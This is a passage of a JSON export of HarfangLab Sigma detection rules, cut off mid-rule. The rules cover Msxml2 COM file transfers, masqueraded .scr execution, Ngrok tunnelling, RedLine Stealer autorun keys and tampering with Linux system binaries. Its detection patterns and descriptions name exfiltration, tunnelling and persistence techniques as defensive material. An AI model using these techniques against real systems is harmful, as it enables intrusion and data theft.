"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b2015219-0f93-4180-a062-fd0c7e57fa28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090262Z",
"creation_date": "2026-03-23T11:45:34.090264Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090269Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_msxml2_http_filetransfer_wmi.yml",
"content": "title: File Transfered via Msxml2 COM Object\nid: b2015219-0f93-4180-a062-fd0c7e57fa28\ndescription: |\n Detects scripts using the Msxml2.XMLHTTP COM Object to download files.\n Attackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate looking commands and network traffic.\n It is recommended to check Outlook home page registry configuration for suspicious content such as command executed by the Outlook process with the help of the VBScript telemetry, it is recommended to investigate the downloaded files and any programs executed in the context of this alert.\nreferences:\n - https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2025/10/06\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1105\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.AmsiScan\n - classification.Windows.Script.VBScript\n - classification.Windows.Script.Jscript\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: amsi_scan\ndetection:\n selection_vbscript:\n AppName:\n - 'VBScript'\n - 'OFFICE_VBA'\n TextPayload|contains|all:\n - 'CreateObject(\"MSXML2.ServerXMLHTTP\")'\n - '.Open '\n - '.Send '\n\n selection_jscript:\n AppName: 'JScript'\n TextPayload|contains|all:\n - 'ActiveXObject(\"MSXML2.XMLHTTP\")'\n - '.open('\n - '.send('\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b2015219-0f93-4180-a062-fd0c7e57fa28",
"rule_name": "File Transfered via Msxml2 COM Object",
"rule_description": "Detects scripts using the Msxml2.XMLHTTP COM Object to download files.\nAttackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate looking commands and network traffic.\nIt is recommended to check Outlook home page registry configuration for suspicious content such as command executed by the Outlook process with the help of the VBScript telemetry, it is recommended to investigate the downloaded files and any programs executed in the context of this alert.\n",
"rule_creation_date": "2025-10-06",
"rule_modified_date": "2025-10-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1059.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b20eab34-dd0f-427c-8b8a-b77db11d2ff2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086104Z",
"creation_date": "2026-03-23T11:45:34.086106Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086110Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/the-epic-turla-operation/65545/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_execution_scr_file.yml",
"content": "title: Suspicious .scr File Execution\nid: b20eab34-dd0f-427c-8b8a-b77db11d2ff2\ndescription: |\n Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\n Usually, this type of file is located in 'C:\\\\Windows\\\\System32\\\\' or 'C:\\\\Windows\\\\SysWOW64\\\\' and this program is executed after a configurable time of user inactivity.\n Attackers can used this file to gain execution during a phishing campaign by masquerading a malicious file to increase the likelihood that a user will open and successfully execute it.\n It is recommended to check the .scr file origin and the legitimacy of its presence on the system.\nreferences:\n - https://securelist.com/the-epic-turla-operation/65545/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2022/02/15\nmodified: 2026/01/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.persistence\n - attack.t1546.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessProcessName|endswith: '.scr'\n\n filter_directory:\n CurrentDirectory:\n - '?:\\Windows\\System32'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\ImmersiveControlPanel\\'\n\n filter_winlogon:\n ParentImage:\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\SysWOW64\\winlogon.exe'\n\n filter_microsoft:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_rundll32:\n CommandLine|startswith: 'rundll32.exe desk.cpl,InstallScreenSaver '\n\n exclusion_boinc1:\n Image: '?:\\Windows\\boinc.scr'\n Signed: 'true'\n Signature: 'University of California, Berkeley'\n exclusion_boinc2:\n ParentImage:\n - '?:\\Program Files\\BOINC\\boincmgr.exe'\n - '?:\\Program Files (x86)\\BOINC\\boincmgr.exe'\n\n exclusion_kiosk:\n Image: '?:\\Windows\\SysWOW64\\SKPlayer.scr'\n ParentCommandLine|startswith: '?:\\Program Files (x86)\\SiteKiosk\\SiteKiosk.exe'\n\n exclusion_flywin:\n # Fenetres Volantes.scr\n ProcessSha256: '129f41492be8351350bbd65569908d288b82760626c02696a3c8e5cc5231b805'\n\n exclusion_earth:\n Description: 'Earth Screen Saver for Windows'\n OriginalFileName: 'EARTH.SCR'\n\n exclusion_google:\n Description: 'Google Photos Screensaver'\n OriginalFileName: 'GPhotos.SCR'\n\n exclusion_webshot:\n Description: 'Webshots Photo Manager'\n OriginalFileName: 'Webshots2.SCR'\n\n exclusion_bubbles:\n Description: 'Bubbles Screen Saver'\n OriginalFileName: 'Bubbles'\n\n exclusion_irfanview:\n Description: 'Slideshow PlugIn for IrfanView'\n OriginalFileName: 'Slideshow.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b20eab34-dd0f-427c-8b8a-b77db11d2ff2",
"rule_name": "Suspicious .scr File Execution",
"rule_description": "Detects the execution of a suspicious .scr file, a Portable Executable (PE) file related to the Windows screensaver application.\nUsually, this type of file is located in 'C:\\\\Windows\\\\System32\\\\' or 'C:\\\\Windows\\\\SysWOW64\\\\' and this program is executed after a configurable time of user inactivity.\nAttackers can used this file to gain execution during a phishing campaign by masquerading a malicious file to increase the likelihood that a user will open and successfully execute it.\nIt is recommended to check the .scr file origin and the legitimacy of its presence on the system.\n",
"rule_creation_date": "2022-02-15",
"rule_modified_date": "2026-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b3222cdc-4054-4f68-9306-a77d513f35a9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296499Z",
"creation_date": "2026-03-23T11:45:35.296501Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296505Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/hakluke/status/1679023050526687244",
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/software/S0508/"
],
"name": "t1090_ngrok_tunnel_dns_request.yml",
"content": "title: Ngrok Tunnel via an Uncommon Binary\nid: b3222cdc-4054-4f68-9306-a77d513f35a9\ndescription: |\n This rule detects DNS requests to the official Ngrok tunnels domain via an uncommon binary.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n If you believe this to be an indicator of malicious activity, you should take investigative actions.\n It is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n filter_ngrok:\n - ProcessOriginalFileName: 'ngrok.exe'\n - ProcessProduct: 'ngrok agent'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_digicam:\n # SHA256: 61af1afdef0d715eb78b651ce4ae5789c234ba72d0e38e7a89b7577bda15d453\n ProcessImage: '?:\\Program Files (x86)\\digiCamControl\\ngrok.exe'\n ProcessOriginalFileName: ''\n\n exclusion_npm:\n # SHA256: 60da82035702204c6219c08359c8944bbd254e6bdebc58443ad22e12019f3ab6\n ProcessImage|contains: 'AppData\\Roaming\\npm\\node_modules\\@expo\\ngrok\\node_modules\\@expo\\ngrok-bin'\n ProcessOriginalFileName: ''\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\NisSrv.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_nexthink:\n ProcessImage: '?:\\Program Files\\Nexthink\\Collector\\Collector\\nxtsvc.exe'\n\n exclusion_docker:\n ProcessImage: '?:\\Program Files\\Docker\\Docker\\resources\\com.docker.backend.exe'\n\n exclusion_wsl:\n ProcessImage: '?:\\Program Files\\WSL\\wslservice.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b3222cdc-4054-4f68-9306-a77d513f35a9",
"rule_name": "Ngrok Tunnel via an Uncommon Binary",
"rule_description": "This rule detects DNS requests to the official Ngrok tunnels domain via an uncommon binary.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIf you believe this to be an indicator of malicious activity, you should take investigative actions.\nIt is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2026-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b35627f7-4023-4179-ac3f-a23860a35cfc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083147Z",
"creation_date": "2026-03-23T11:45:34.083149Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://socradar.io/what-is-redline-stealer-and-what-can-you-do-about-it/",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
"https://attack.mitre.org/techniques/T1547/001/",
"https://attack.mitre.org/techniques/T1218/009/"
],
"name": "t1547_001_redline_regsvcs_autorun_key.yml",
"content": "title: Registry Autorun Key associated with RedLine Stealer\nid: b35627f7-4023-4179-ac3f-a23860a35cfc\ndescription: |\n Detects when an entry is added/modified in one of the autostart extensibility point (ASEP) in paths associated with the RedLine Stealer.\n Public samples of the RedLineStealer have been observed to set up persistence by adding Registry AutoRunKeys with RegSvcs.exe or other binaries downloaded to disk.\n The RegSvcs.exe is a legitimate binary that can be used as a LOLBin to load malicious DLLs into system processes.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://socradar.io/what-is-redline-stealer-and-what-can-you-do-about-it/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\n - https://attack.mitre.org/techniques/T1547/001/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/03/04\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.Registry\n - classification.Windows.Stealer.RedLine\n - classification.Windows.LOLBin.Regsvcs\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_malbin:\n - Details|contains: '?:\\\\*\\\\*\\AppData\\Roaming\\telemetry\\svcservice.exe'\n - ProcessImage: '?:\\Users\\\\*\\Pictures\\\\*\\\\????????????????????????.exe'\n\n selection_regsvcs:\n Details|contains:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe'\n TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RegSvcs'\n\n filter_setup:\n ProcessImage|endswith:\n - '\\dotnet-sdk*.exe'\n - '\\dotnet_full*.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_*\nfalsepositives:\n - '.NET applications may create a RegSvcs.exe full path key in registry, however this is very uncommon behaviour.'\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b35627f7-4023-4179-ac3f-a23860a35cfc",
"rule_name": "Registry Autorun Key associated with RedLine Stealer",
"rule_description": "Detects when an entry is added/modified in one of the autostart extensibility point (ASEP) in paths associated with the RedLine Stealer.\nPublic samples of the RedLineStealer have been observed to set up persistence by adding Registry AutoRunKeys with RegSvcs.exe or other binaries downloaded to disk.\nThe RegSvcs.exe is a legitimate binary that can be used as a LOLBin to load malicious DLLs into system processes.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2023-03-04",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1218.009",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b39c44fa-4f06-491f-a0bd-53f39cb7219e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.515171Z",
"creation_date": "2026-03-23T11:45:34.626614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626619Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/",
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1554/"
],
"name": "t1036_005_suspicious_modification_of_essential_binaries.yml",
"content": "title: Suspicious Modification of System Binaries\nid: b39c44fa-4f06-491f-a0bd-53f39cb7219e\ndescription: |\n Detects a suspicious modification of a system binary, such as ls, ssh or bash.\n Adversaries may try to modify system binaries to steal credentials, setup persistence or provide a remotely accessible backdoor.\n It is recommended to ensure that the process writing to those binaries is a legitimate installer and that the new file isn't malicious.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1554/\ndate: 2024/06/19\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - attack.persistence\n - attack.t1554\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n\n # TODO: Improve this condition when regex are fully available\n Path:\n - '/bin/ls'\n - '/sbin/ls'\n - '/usr/bin/ls'\n - '/usr/sbin/ls'\n - '/bin/cat'\n - '/sbin/cat'\n - '/usr/bin/cat'\n - '/usr/sbin/cat'\n - '/bin/sh'\n - '/sbin/sh'\n - '/usr/bin/sh'\n - '/usr/sbin/sh'\n - '/bin/bash'\n - '/sbin/bash'\n - '/usr/bin/bash'\n - '/usr/sbin/bash'\n - '/bin/dash'\n - '/sbin/dash'\n - '/usr/bin/dash'\n - '/usr/sbin/dash'\n - '/bin/sudo'\n - '/sbin/sudo'\n - '/usr/bin/sudo'\n - '/usr/sbin/sudo'\n - '/bin/su'\n - '/sbin/su'\n - '/usr/bin/su'\n - '/usr/sbin/su'\n - '/bin/cron'\n - '/sbin/cron'\n - '/usr/bin/cron'\n - '/usr/sbin/cron'\n - '/bin/ssh'\n - '/sbin/ssh'\n - '/usr/bin/ssh'\n - '/usr/sbin/ssh'\n - '/bin/sshd'\n - '/sbin/sshd'\n - '/usr/bin/sshd'\n - '/usr/sbin/sshd'\n - '/bin/telnetd'\n - '/sbin/telnetd'\n - '/usr/bin/telnetd'\n - '/usr/sbin/telnetd'\n - '/bin/busybox'\n - '/sbin/busybox'\n - '/usr/bin/busybox'\n - '/usr/sbin/busybox'\n - '/bin/nologin'\n - '/sbin/nologin'\n - '/usr/bin/nologin'\n - '/usr/sbin/nologin'\n - '/bin/init'\n - '/sbin/init'\n - '/usr/bin/init'\n - '/usr/sbin/init'\n - '/bin/systemd-*'\n - '/sbin/systemd-*'\n - '/usr/bin/systemd-*'\n - '/usr/sbin/systemd-*'\n - '/usr/lib/systemd/systemd-*'\n - '/usr/lib/systemd/systemd'\n\n selection_rename:\n Kind: 'rename'\n # TODO: Improve this condition when regex are fully available\n TargetPath:\n - '/bin/ls'\n - '/sbin/ls'\n - '/usr/bin/ls'\n - '/usr/sbin/ls'\n - '/bin/cat'\n - '/sbin/cat'\n - '/usr/bin/cat'\n - '/usr/sbin/cat'\n - '/bin/sh'\n - '/sbin/sh'\n - '/usr/bin/sh'\n - '/usr/sbin/sh'\n - '/bin/bash'\n - '/sbin/bash'\n - '/usr/bin/bash'\n - '/usr/sbin/bash'\n - '/bin/dash'\n - '/sbin/dash'\n - '/usr/bin/dash'\n - '/usr/sbin/dash'\n - '/bin/sudo'\n - '/sbin/sudo'\n - '/usr/bin/sudo'\n - '/usr/sbin/sudo'\n - '/bin/su'\n - '/sbin/su'\n - '/usr/bin/su'\n - '/usr/sbin/su'\n - '/bin/cron'\n - '/sbin/cron'\n - '/usr/bin/cron'\n - '/usr/sbin/cron'\n - '/bin/ssh'\n - '/sbin/ssh'\n - '/usr/bin/ssh'\n - '/usr/sbin/ssh'\n - '/bin/sshd'\n - '/sbin/sshd'\n - '/usr/bin/sshd'\n - '/usr/sbin/sshd'\n - '/bin/telnetd'\n - '/sbin/telnetd'\n - '/usr/bin/telnetd'\n - '/usr/sbin/telnetd'\n - '/bin/busybox'\n - '/sbin/busybox'\n - '/usr/bin/busybox'\n - '/usr/sbin/busybox'\n - '/bin/nologin'\n - '/sbin/nologin'\n - '/usr/bin/nologin'\n - '/usr/sbin/nologin'\n - '/bin/init'\n - '/sbin/init'\n - '/usr/bin/init'\n - '/usr/sbin/init'\n - '/bin/systemd-*'\n - '/sbin/systemd-*'\n - '/usr/bin/systemd-*'\n - '/usr/sbin/systemd-*'\n - '/usr/lib/systemd/systemd-*'\n - '/usr/lib/systemd/systemd'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/bin/dpkg dpkg'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/bin/dpkg dpkg'\n - ProcessGrandparentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/bin/dpkg dpkg'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessImage:\n - '/usr/bin/tdnf'\n - '/usr/bin/dnf5'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade'\n - 'dnf update'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - 